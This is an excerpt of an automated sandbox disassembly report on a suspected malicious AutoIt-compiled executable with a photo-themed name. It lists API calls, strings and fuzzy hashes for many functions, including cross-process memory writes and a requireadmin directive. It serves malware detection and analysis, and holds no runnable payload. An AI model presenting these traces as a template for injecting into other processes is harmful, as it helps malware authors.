                                                                      • _free.LIBCMT ref: 00D4224E
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • _free.LIBCMT ref: 00D42260
                                                                      • _free.LIBCMT ref: 00D42273
                                                                      • _free.LIBCMT ref: 00D42284
                                                                      • _free.LIBCMT ref: 00D42295
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 0b0b10b59e5e17fdad505ad93c507795e9969b88c5560cff51985df2b1b73447
                                                                      • Instruction ID: 25083b809d4df6a6f0a4711d47feb170128d6e2cef21b910ca5a2cb24108ab0f
                                                                      • Opcode Fuzzy Hash: 0b0b10b59e5e17fdad505ad93c507795e9969b88c5560cff51985df2b1b73447
                                                                      • Instruction Fuzzy Hash: BFF030756513929B8A11BF94AC8281C3B64FB18761B851507F614DA371C77114D3EFB8
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00D2AA5A
                                                                      • StrokeAndFillPath.GDI32(?,?,00D67BB4,00000000,?,?,?), ref: 00D2AA76
                                                                      • SelectObject.GDI32(?,00000000), ref: 00D2AA89
                                                                      • DeleteObject.GDI32 ref: 00D2AA9C
                                                                      • StrokePath.GDI32(?), ref: 00D2AAB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: fa27a91cee45e4601894a9d43ad8313081a8dff7aadd0845d40c8fe9e6adaf0b
                                                                      • Instruction ID: 230556c3732bb79798e9073e26f5917322d02571f3e6c6a33023b60b0b89d8a0
                                                                      • Opcode Fuzzy Hash: fa27a91cee45e4601894a9d43ad8313081a8dff7aadd0845d40c8fe9e6adaf0b
                                                                      • Instruction Fuzzy Hash: F6F01935105344EBDB11AF68EE587693B60EB2132AF448214F465D92F2C7348891DF35
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: 210a6161fd7c8abad67bfee07b53f2eedf4bf172a288d923ee71e44eeb232b7a
                                                                      • Instruction ID: e673f700f7b6ab2fd9efaa53603bd67c1df6f8560f761d4c1956c13237f54989
                                                                      • Opcode Fuzzy Hash: 210a6161fd7c8abad67bfee07b53f2eedf4bf172a288d923ee71e44eeb232b7a
                                                                      • Instruction Fuzzy Hash: 33D10339900206DBDB249FA8C88A7BEBBB0FF05300F284159E981EB645D3759DC0CBB5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3$A$_
                                                                      • API String ID: 176396367-1956071190
                                                                      • Opcode ID: 1d75a6cbcba06ae5e63562291108a134045c7c32ac854845a6b3a86eaa1f2138
                                                                      • Instruction ID: 7133d236c3c6ebd9a8ff0bc8a4d466ad5f1ea248ead48c78d258b9546f743b0e
                                                                      • Opcode Fuzzy Hash: 1d75a6cbcba06ae5e63562291108a134045c7c32ac854845a6b3a86eaa1f2138
                                                                      • Instruction Fuzzy Hash: 2781F631A00201AACF249F98E4816FDB7B1FF98760F28451AED919B2D1DF74CAC587B0
                                                                      APIs
                                                                        • Part of subcall function 00D7B321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D72114,?,?,00000034,00000800,?,00000034), ref: 00D7B34B
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D726A4
                                                                        • Part of subcall function 00D7B2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D72143,?,?,00000800,?,00001073,00000000,?,?), ref: 00D7B316
                                                                        • Part of subcall function 00D7B248: GetWindowThreadProcessId.USER32(?,?), ref: 00D7B273
                                                                        • Part of subcall function 00D7B248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D720D8,00000034,?,?,00001004,00000000,00000000), ref: 00D7B283
                                                                        • Part of subcall function 00D7B248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D720D8,00000034,?,?,00001004,00000000,00000000), ref: 00D7B299
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D72711
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7275E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 419db5387e82963257defa30d7ea3369ec7b14ae9eacde3ee0151ddba2cf9484
                                                                      • Instruction ID: 88776c0e2f55033fcf78d9725fa3862fe543b02f4185d051e015c4401fe631ab
                                                                      • Opcode Fuzzy Hash: 419db5387e82963257defa30d7ea3369ec7b14ae9eacde3ee0151ddba2cf9484
                                                                      • Instruction Fuzzy Hash: E1412D76901218AFDB10DFA4CD85BEEBBB8EB09310F148055F949B7191DA706E85CB70
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe,00000104), ref: 00D416F9
                                                                      • _free.LIBCMT ref: 00D417C4
                                                                      • _free.LIBCMT ref: 00D417CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe
                                                                      • API String ID: 2506810119-3152190288
                                                                      • Opcode ID: 3089ddd40fd3777f8c1fb826059d5756023f6ab39a47f243ac5abfcba5d7fc9b
                                                                      • Instruction ID: 5d32edf535982601d0edef7efd1ceaea588a9c80e143c7a1f2bbfb833fbf682c
                                                                      • Opcode Fuzzy Hash: 3089ddd40fd3777f8c1fb826059d5756023f6ab39a47f243ac5abfcba5d7fc9b
                                                                      • Instruction Fuzzy Hash: 47318F79A40258EBDB21DF99DC85DAEBBFCEB85310F144166F504DB210D6B08E80CBB0
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D7C224
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00D7C26A
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00DE1990,00ED6C80), ref: 00D7C2B3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 0377444b939046030129abc76f8457ab7224b3e2d098fbdf7d1b6e246d422635
                                                                      • Instruction ID: 36f0cc89811e88fdbe155532cad10a7c2b693c93715770b0d480ab514aebf69e
                                                                      • Opcode Fuzzy Hash: 0377444b939046030129abc76f8457ab7224b3e2d098fbdf7d1b6e246d422635
                                                                      • Instruction Fuzzy Hash: 2C41D230215301AFD720DF64D844B5AB7E8EF85324F14852EF8AA97292E730E904CB7A
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DAD0D0,00000000,?,?,?,?), ref: 00DA43DF
                                                                      • GetWindowLongW.USER32 ref: 00DA43FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA440C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: e740211ebdda000be5cdbf9b46833fb16ca1e917cf47bc983d97d4f993793847
                                                                      • Instruction ID: da7b4fd66adae286be766eee35390a4e27cef422bfc5637bd9fb74cab75ea1a2
                                                                      • Opcode Fuzzy Hash: e740211ebdda000be5cdbf9b46833fb16ca1e917cf47bc983d97d4f993793847
                                                                      • Instruction Fuzzy Hash: 58318D31104205AFDF109F38DC45BEA77A9EB4A334F284724F979D22E0D7B0A8548B70
                                                                      APIs
                                                                        • Part of subcall function 00D93282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00D92F9E,?,?), ref: 00D9329F
                                                                      • inet_addr.WSOCK32(?), ref: 00D92FA1
                                                                      • _wcslen.LIBCMT ref: 00D92FC2
                                                                      • htons.WSOCK32(00000000), ref: 00D9302D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 946324512-2422070025
                                                                      • Opcode ID: a8e12524c7d6b5d9dfeb9b55a638f810d04a66a3154f7d3f5dfc47af7f200c5c
                                                                      • Instruction ID: ebc2761fa78428a2f27b320d33d613aa8835be36e0f82ccc37aa8854ac0aa8f4
                                                                      • Opcode Fuzzy Hash: a8e12524c7d6b5d9dfeb9b55a638f810d04a66a3154f7d3f5dfc47af7f200c5c
                                                                      • Instruction Fuzzy Hash: 3E31B3356002019FCB20CF69C585EAA7BF0EF15328F298199E81A8F792D775EE45C770
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DA3E73
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DA3E87
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA3EAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: a622208aa5d86a7f1b1d341ceff4200d442120026d68734cd3f74d305166bc1b
                                                                      • Instruction ID: 686ebe3a5e2314e7c16b1eea2f75e6a8cccb04149c7d6c49a0a47e37f258d26c
                                                                      • Opcode Fuzzy Hash: a622208aa5d86a7f1b1d341ceff4200d442120026d68734cd3f74d305166bc1b
                                                                      • Instruction Fuzzy Hash: 0A21A132600219BBDF11CF54CC42FEA3B76EF49724F150214FA55AB1D0DAB5AD548BB0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DA463A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DA4648
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DA464F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: 81a3f704741c34c136d1a9e289f62e3227b2a08d691352539c089c015996e481
                                                                      • Instruction ID: a5e7af74c2b9288d863de57b8306e7882e4d55b2cc830825980428b4e76363d3
                                                                      • Opcode Fuzzy Hash: 81a3f704741c34c136d1a9e289f62e3227b2a08d691352539c089c015996e481
                                                                      • Instruction Fuzzy Hash: 3C214CB5600214AFDB10DF28DC91DB737ACEB9A3A4B080459FA109B361DB71EC559A70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: 766be771c0163f4757b16579d0d0b648ce8abe5bf6082424993665562bc16a00
                                                                      • Instruction ID: dfa36b52cb354fbce45e0881f853cf9be036318184bede4a8246d6a140e5d3fe
                                                                      • Opcode Fuzzy Hash: 766be771c0163f4757b16579d0d0b648ce8abe5bf6082424993665562bc16a00
                                                                      • Instruction Fuzzy Hash: 1621F6336042216AD632A724AC22FABF3D8DF95310F58C025F94A86185FB61A94693B5
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DA3773
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DA3783
                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DA37A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: 147115bf5060f950c570e2206e95e993f75f11de2794c2543db251cf90b3cae7
                                                                      • Instruction ID: 2ec29a8ef06565198ae99c927135268650313ee33ed18552ef2859827ee7bcdd
                                                                      • Opcode Fuzzy Hash: 147115bf5060f950c570e2206e95e993f75f11de2794c2543db251cf90b3cae7
                                                                      • Instruction Fuzzy Hash: 6021D4B2610218BBEF118F54DC85EBB376FEF8A764F048114F9449B290CA71EC5187B0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D84926
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D8497A
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00DAD0D0), ref: 00D849EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 6fb12749c0ab81558e89943b3ec41c02493c1dbc1edc77245187a0cb72fae0e7
                                                                      • Instruction ID: 0c905848e921e87c01d8456f524d8d9ce44907a61d1f7d3038a486e1419bc755
                                                                      • Opcode Fuzzy Hash: 6fb12749c0ab81558e89943b3ec41c02493c1dbc1edc77245187a0cb72fae0e7
                                                                      • Instruction Fuzzy Hash: C7314C75A00209AFDB10EF54C885EAA7BB9EF05318F1480A9F909DB352DB71EE45CB71
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DA4184
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DA4199
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DA41A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: daa561f97df8943e224d4a9b7f3d9324313035582c53d394c8d636e91c7899ce
                                                                      • Instruction ID: 70d27da1d4eec16a8b2dbee5cb0276e1fdcbd13c5388830112ee240b57a5bea1
                                                                      • Opcode Fuzzy Hash: daa561f97df8943e224d4a9b7f3d9324313035582c53d394c8d636e91c7899ce
                                                                      • Instruction Fuzzy Hash: 0B110631240308BEEF105F24CC46FA73BA8EFA6B24F010514FA55E61A0D6B1DC919B70
                                                                      APIs
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                        • Part of subcall function 00D72CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D72D09
                                                                        • Part of subcall function 00D72CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D72D1A
                                                                        • Part of subcall function 00D72CEB: GetCurrentThreadId.KERNEL32 ref: 00D72D21
                                                                        • Part of subcall function 00D72CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D72D28
                                                                      • GetFocus.USER32 ref: 00D72EBB
                                                                        • Part of subcall function 00D72D32: GetParent.USER32(00000000), ref: 00D72D3D
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D72F06
                                                                      • EnumChildWindows.USER32(?,00D72F7E), ref: 00D72F2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
